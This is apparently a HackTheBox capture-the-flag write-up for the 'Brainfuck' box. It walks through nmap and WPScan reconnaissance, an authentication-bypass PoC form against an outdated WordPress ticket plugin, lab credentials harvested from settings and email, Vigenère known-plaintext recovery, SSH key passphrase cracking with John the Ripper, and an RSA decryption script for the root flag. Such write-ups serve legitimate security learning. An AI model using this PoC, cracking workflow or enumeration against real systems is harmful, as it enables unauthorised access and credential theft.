HackTheBox Write-Up — Brainfuck
Brainfuck is a challenging box that involves chaining many steps, an understanding of cryptography, and a unique privilege escalation.
nmap -T4 -p- 10.10.10.17
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-19 10:15 EDT
Nmap scan report for 10.10.10.17
Host is up (0.056s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 130.62 seconds
nmap -T4 -A -p22,25,110,143,443 10.10.10.17
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-19 10:18 EDT
Nmap scan report for 10.10.10.17
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: USER SASL(PLAIN) TOP RESP-CODES AUTH-RESP-CODE PIPELINING CAPA UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: LITERAL+ capabilities IMAP4rev1 OK more have post-login LOGIN-REFERRALS AUTH=PLAINA0001 ID listed ENABLE Pre-login SASL-IR IDLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10-4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16-4.6 (92%), Linux 3.18 (92%), Linux 3.2-4.9 (92%), Linux 3.8-3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 55.44 ms 10.10.14.1
2 55.55 ms 10.10.10.17
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.83 seconds
While it would be good to enumerate each service version, Nmap is already showing us some additional information about port 443, including DNS names from the certificate and a default web page.
The machine serves the default nginx page and does not respond properly when accessed by IP address, so we need to add the DNS records to our /etc/hosts file.
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.17 www.brainfuck.htb sup3rs3cr3t.brainfuck.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Running Nikto against these hosts reveals an email address in the certificate information; keep in mind that ports 25, 110 and 143 (SMTP, POP3, IMAP) are open.
nikto -h https://brainfuck.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.17
+ Target Hostname: brainfuck.htb
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/emailAddress=orestis@brainfuck.htb
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/emailAddress=orestis@brainfuck.htb
+ Start Time: 2020-05-25 16:44:44 (GMT-4)
---------------------------------------------------------------------------
Because we are dealing with a WordPress site… why not run a WordPress Scan?
$ wpscan --url https://brainfuck.htb --disable-tls-checks
WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
Within the WPScan output we find an outdated plugin which appears to have a number of vulnerabilities.
[+] Name: wp-support-plus-responsive-ticket-system - v7.1.3
| Last updated: 2018-08-15T05:44:00.000Z
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Readme: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[!] The version is out of date, the latest version is 9.1.0
[!] Directory listing is enabled: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
By searching for the plugin along with its version on Google, we find two exploits. Based on my own experience, 41006 is the only one that works.
Download the exploit using Searchsploit and the EDB-ID.
searchsploit -m 41006
2. Proof of Concept
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
This exploit has us host the PoC code locally and execute an SQL injection attack against our target.
Put the modified PoC into a file called privesc.html and open it in Firefox.
As you can see, we are going to need a username, so let's use WPScan again to enumerate usernames.
$ wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate u
WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+---------------+---------------+
| ID | Login | Name |
+----+---------------+---------------+
| 1 | admin | admin |
| 2 | administrator | administrator |
+----+---------------+---------------+
[!] Default first WordPress username 'admin' is still used
Starting with the default “admin” account, we type the username into our SQL injection file and click “Login.”
Checking back on https://brainfuck.htb we’ve successfully managed to elevate privilege to an authenticated user.
After browsing through the https://brainfuck.htb/wp-admin/ portal, we stumble across some credentials under the "Settings" option of the "Easy WP SMTP" plugin.
You can grab the credentials on this page by right-clicking the password field, choosing "Inspect Element" and expanding the element in the inspector.
orestis@brainfuck.htb | KHGuERB29DNiNE
We take these credentials and use Thunderbird to enumerate the mailbox.
apt-get install thunderbird
After we login to the email account with Thunderbird, we come across another set of credentials inside the inbox giving access to the forum.
orestis | kIEnnfEKJ#9UmdO
Once logged in to the forum we come across an encrypted conversation between Orestis and the Administrator. Based on the plain-text conversation, Orestis is very rudely requesting an SSH key.
Looking closely at the plain-text conversation and the encrypted one, there appears to be one similarity between the two: Orestis's signature, "Orestis - Hacking for fun and profit."
We are going to try what is called a known-plaintext attack (KPA) to uncover the SSH key in the cipher-text. To do this, we first need to identify the type of cipher.
The link above leads to a website where we can paste the first piece of cipher-text we highlighted and determine the type of cipher.
Pieagnm - Jkoijeg nbw zwx mle grwsnn
A couple of curious clicks bring us to this website's "Vigenère Cipher Tool." Note: scrolling down on this page gives a great explanation of the cipher's origin and how to decrypt it manually. I highly recommend giving their exercise a shot to best understand the basics of cryptography.
Throwing the cipher-text in to decrypt, and playing around with the known plain-text, I started to see some English appear after removing some spaces and dashes.
Brainfu - Ckmybra inf uck myb rainfu
By reusing this method of removing spaces and special characters, and through trial and error, I discovered the key is fuckmybrain, as shown below.
fuckmybrain
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
There you go you stupid fuck, I hope you remember your key password because I dont :)https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
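The known-plaintext step and the final decryption, as an added Python example that is not part of the original write-up: it derives the key stream from the signature pair, finds the repeating period, lists the candidate rotations of the key (the signature sits at the end of a message, so the recovered stream is the key at an unknown phase), and decrypts the quoted message with the key the author found. Function names are my own; the strings are the ones quoted above.

```python
import string
ALPHA = string.ascii_lowercase

def recover_keystream(plaintext, ciphertext):
    """Known-plaintext step: key letter = (cipher - plain) mod 26. Non-letters are
    skipped because the cipher leaves them unchanged and does not advance the key."""
    p = [ch for ch in plaintext.lower() if ch in ALPHA]
    c = [ch for ch in ciphertext.lower() if ch in ALPHA]
    if len(p) != len(c):
        raise ValueError("plaintext and ciphertext letter counts differ")
    return "".join(ALPHA[(ALPHA.index(cc) - ALPHA.index(pp)) % 26] for pp, cc in zip(p, c))

def smallest_period(stream):
    """Key length: smallest shift under which the stream repeats (len(stream) if the known text is shorter than the key)."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)

def candidate_keys(stream):
    """All rotations of one period: the signature sits at the end of a message, so
    the recovered stream is the key rotated by an unknown offset."""
    n = smallest_period(stream)
    return [stream[i:n] + stream[:i] for i in range(n)]

def vigenere_decrypt(ciphertext, key):
    """Standard Vigenère decryption: case preserved, non-letters pass through."""
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha() and ch.lower() in ALPHA:
            shift = ALPHA.index(key[k % len(key)])
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)

# Signature pair and the message cipher-text exactly as quoted in the write-up.
SIG_PLAIN = "Orestis - Hacking for fun and profit"
SIG_CIPHER = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
MSG_CIPHER = ("Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec "
              "J uovg :)mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr")

if __name__ == "__main__":
    ks = recover_keystream(SIG_PLAIN, SIG_CIPHER)   # brainfuckmybrainfuckmybrainfu
    print("keystream:", ks, "period:", smallest_period(ks))
    for key in candidate_keys(ks):                  # only one phase reads as English
        print(key, "->", vigenere_decrypt(MSG_CIPHER, key)[:40])
```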
We have a link to the id_rsa, and after downloading we quickly find this file is encrypted with a password.
We are able to crack this password with John the Ripper, but first we need to convert the key into a format John can crack. We will use a common script called ssh2john.py.
wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
We’re going to run this script against the id_rsa, then append the output to a file called john.txt
python ssh2john.py id_rsa > john.txt
You might also have ssh2john already installed on your Kali machine. To avoid confusion, I will write that output to brainfuck.txt, because the output is different.
ssh2john id_rsa > brainfuck.txt
Whichever way you decided to go with, you should have an output file. We are going to crack this output file with John, and the rockyou.txt word list.
john john.txt --wordlist=/usr/share/wordlists/rockyou.txt
john brainfuck.txt --wordlist=/usr/share/wordlists/rockyou.txt
orestis | 3poulakia!
Now that we have the password, we can gain a foothold on the machine via SSH with Orestis's id_rsa key and the credentials shown above.
ssh -i id_rsa orestis@brainfuck.htb
Within Orestis's home directory we notice a file called encrypt.sage.
As far as I can tell, we are dealing with RSA encryption when we research the variables P, Q, and E. The contents of encrypt.sage suggest that our objective file, /root/root.txt, is used as the input: the encrypted password is written to output.txt, and P, Q, and E are stored in debug.txt. The variables are defined as:
p = 1st prime number
q = 2nd prime number
e = public/encryption exponent
ct = cipher-text
Credit where it's due: someone a lot smarter than myself has written a Python script to decrypt this. Essentially, we need P, Q, and E to recover the private key with the Extended Euclidean Algorithm and then use it:
n = p*q
phi = (p-1)*(q-1)
gcd, a, b = egcd(e, phi)
d = decryption key (private exponent)
We can compute this because we have read access to debug.txt and output.txt, which give us the following values:
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
#!/usr/bin/env python3
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

# Values from debug.txt (p, q, e) and output.txt (ct) on the box, as listed above
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

def egcd(a, b):
    """Extended Euclidean Algorithm: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        quot, r = b // a, b % a
        m, n = x - u * quot, y - v * quot
        b, a, x, y, u, v = a, r, u, v, m, n
    return b, x, y

n = p * q                  # modulus: product of the two primes
phi = (p - 1) * (q - 1)    # Euler's totient of n
gcd, a, b = egcd(e, phi)   # a*e + b*phi = gcd(e, phi)
assert gcd == 1, "e has no inverse modulo phi"
d = a % phi                # private exponent: the modular inverse of e (reduced so it is positive)

print("d_hex: " + hex(d))
print("d_dec: " + str(d))
pt = pow(ct, d, n)         # RSA decryption: m = ct^d mod n
print("pt_dec: " + str(pt))
# The plaintext integer is the big-endian encoding of the original root.txt bytes
flag = pt.to_bytes((pt.bit_length() + 7) // 8, "big")
print("flag")
print(flag.decode("utf-8", errors="replace"))
Ensure you modify the script and input the proper parameters before running.
python rsa_egcd.py